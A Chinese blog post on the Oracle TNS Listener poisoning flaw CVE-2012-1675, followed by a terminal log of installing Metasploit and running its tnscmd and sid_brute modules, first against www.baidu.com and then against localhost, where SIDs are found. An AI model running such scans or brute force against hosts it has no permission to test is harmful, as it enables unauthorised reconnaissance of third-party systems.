溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Oracle TNS Listener Remote Poisoning 測(cè)試

發(fā)布時(shí)間:2020-06-11 16:31:58 來源:網(wǎng)絡(luò) 閱讀:1508 作者:xingzhehxiang 欄目:關(guān)系型數(shù)據(jù)庫

  1. 遠(yuǎn)程數(shù)據(jù)投毒漏洞(CVE-2012-1675)
    允許***者在不提供用戶名/密碼的情況下,向遠(yuǎn)程“TNS Listener”組件處理的數(shù)據(jù)投毒的漏洞。
    COST 是class of secure transports 的縮寫。是為了控制實(shí)例注冊(cè)提供的一種安全控制機(jī)制。其作用是對(duì)于一個(gè)確定的listener,限制哪些實(shí)例通過哪些協(xié)議可以進(jìn)行注冊(cè)。這將避免有其他遠(yuǎn)程實(shí)例進(jìn)行惡意注冊(cè),并由此產(chǎn)生信息泄露等風(fēng)險(xiǎn)。
    它通過在 listner.ora中設(shè)置參數(shù)SECURE_REGISTER_listener_name的值,指定為一個(gè)transport list(限定的注冊(cè)協(xié)議列表,如IPC、TCP、TCPS)來實(shí)現(xiàn)這一功能。 該功能從 10.2.0.3 版本開始支持(雖然10g R2的在線文檔中并未明確說明),一直到11.2.0.4版本及之后依然可用。但是,在11.2.0.4后,oracle建議使用默認(rèn)的VNCR配置。

  2. 危害
    最主要的危害為,***者可以自行創(chuàng)建一個(gè)和當(dāng)前生產(chǎn)數(shù)據(jù)庫同名的數(shù)據(jù)庫,將其向生產(chǎn)數(shù)據(jù)庫的監(jiān)聽注冊(cè)。
    這樣將導(dǎo)致用戶連接被路由指向***者創(chuàng)建的實(shí)例,造成業(yè)務(wù)響應(yīng)中斷
    應(yīng)用程序報(bào)告 ORA-12545: Connect failed because target host or object does not exist
  3. 受到影響的版本
    雖然安全警告描述的是10203開始,但是實(shí)際是從8i開始的任何版本
    4.我的驗(yàn)證

[root@204_maridb ~]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \

chmod 755 msfinstall && \
./msfinstall
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5532 100 5532 0 0 6758 0 --:--:-- --:--:-- --:--:-- 6754
Checking for and installing update..
Adding metasploit-framework to your repository list..已加載插件:fastestmirror
Repository base is listed more than once in the configuration
Repository updates is listed more than once in the configuration
Repository extras is listed more than once in the configuration
Repository centosplus is listed more than once in the configuration
metasploit | 2.9 kB 00:00:00
metasploit/primary_db | 9.8 kB 00:00:00
Loading mirror speeds from cached hostfile

  • epel: mirrors.tuna.tsinghua.edu.cn
    正在解決依賴關(guān)系
    --> 正在檢查事務(wù)
    ---> 軟件包 metasploit-framework.x86_64.0.5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 將被 安裝
    --> 解決依賴關(guān)系完成

依賴關(guān)系解決

========================================================================================================================================================================================================
Package 架構(gòu) 版本 源 大小

正在安裝:
metasploit-framework x86_64 5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 metasploit 195 M

事務(wù)概要

安裝 1 軟件包

總下載量:195 M
安裝大小:433 M
Downloading packages:
警告:/var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: 頭V4 RSA/SHA256 Signature, 密鑰 ID 2007b954: NOKEYMB 00:00:00 ETA
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm 的公鑰尚未安裝
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07
從 file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 檢索密鑰
導(dǎo)入 GPG key 0x2007B954:
用戶ID : "Metasploit <metasploit@rapid7.com>"
指紋 : 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954
來自 : /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
正在安裝 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1
Run msfconsole to get started
驗(yàn)證中 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

已安裝:
metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

完畢!
[root@204_maridb ~]# ms
msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msgcmp msgconv msgexec msgfmt msghack msgmerge msguniq
msfconsole msfdb msfmachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2mysql
[root@204_maridb ~]# msfconsole
-bash: /usr/local/bin/msfconsole: 沒有那個(gè)文件或目錄
[root@204_maridb ~]# which msfconsole
/usr/bin/msfconsole
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]

+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __ | |
| ==c(__(o(__(() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \ | |_______ |
| // \ | |==[msf >]============\ |
| // \ | |__\ |
| // RECON \ | (@)(@)(@)(@)(@)(@)(@)/ |
| // \ | ***** |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l | / || \ |
| | PAYLOAD |""_, | / (|| \ |
| |__||)| | | _||) | |
| |(@)(@)"""|(@)(@)|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+

   =[ metasploit v5.0.19-dev-                         ]
  • -- --=[ 1880 exploits - 1062 auxiliary - 328 post ]
  • -- --=[ 546 payloads - 44 encoders - 10 nops ]
  • -- --=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > info

   Name: Oracle TNS Listener Command Issuer
 Module: auxiliary/admin/oracle/tnscmd
License: Metasploit Framework License (BSD)
   Rank: Normal

Disclosed: 2009-02-01

Provided by:
MC <mc@metasploit.com>

Check supported:
No

Basic options:
Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS www.xxxx.cc yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[-] Auxiliary failed: option RHOSTS failed to validate.
msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS www.baidu.com yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[*] Running module against 61.135.169.125

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Running module against 61.135.169.121
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)
SIDFILE /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS www.baidu.com yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)
SIDFILE /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 61.135.169.121

[] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Running module against 61.135.169.125
[] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[-] 127.0.0.1:1521 - The connection was refused by the remote host (127.0.0.1:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'

[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > exit
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-] 

           .;lxO0KXXXK0Oxl:.
       ,o0WMMMMMMMMMMMMMMMMMMKd,
    'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
  :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,

lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit

   =[ metasploit v5.0.19-dev-                         ]
  • -- --=[ 1880 exploits - 1062 auxiliary - 328 post ]
  • -- --=[ 546 payloads - 44 encoders - 10 nops ]
  • -- --=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI